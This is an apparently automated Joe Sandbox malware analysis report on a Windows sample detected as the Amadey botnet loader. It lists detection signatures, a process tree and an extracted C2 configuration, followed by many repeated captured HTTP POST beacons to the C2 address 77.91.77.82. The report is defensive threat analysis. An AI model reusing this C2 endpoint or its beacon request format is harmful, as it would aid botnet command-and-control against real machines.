Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1464456
MD5:a562c59e3a4d9be348d5581d23e483db
SHA1:7ad7d204946cef1a528064b8b2dfee70402684bc
SHA256:68c00e3bb99dd666c421c6fd6b384ff5641ead666c44936d8e84a9075ff79819
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A562C59E3A4D9BE348D5581D23E483DB)
    • explorti.exe (PID: 4908 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • explorti.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • explorti.exe (PID: 7844 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • explorti.exe (PID: 5324 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • explorti.exe (PID: 4076 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • explorti.exe (PID: 2060 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A562C59E3A4D9BE348D5581D23E483DB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3555727988.0000000000171000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000009.00000003.2915454108.0000000004940000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000000.00000002.1719361703.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        0000000B.00000003.4117971144.0000000004980000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000A.00000003.3515001828.0000000004C70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.ab0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              10.2.explorti.exe.170000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                9.2.explorti.exe.170000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  2.2.explorti.exe.170000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    1.2.explorti.exe.170000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:06/28/24-21:16:04.206734
                      SID:2856147
                      Source Port:49731
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: file.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://77.91.77.82/Hun4Ko/index.php;Avira URL Cloud: Label: phishing
                      Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                      Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Found malware configuration
                      Source: explorti.exe.4908.1.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeReversingLabs: Detection: 47%
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 47%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49731 -> 77.91.77.82:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 77.91.77.82
                      Source: Malware configuration extractorIPs: 77.91.77.82
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
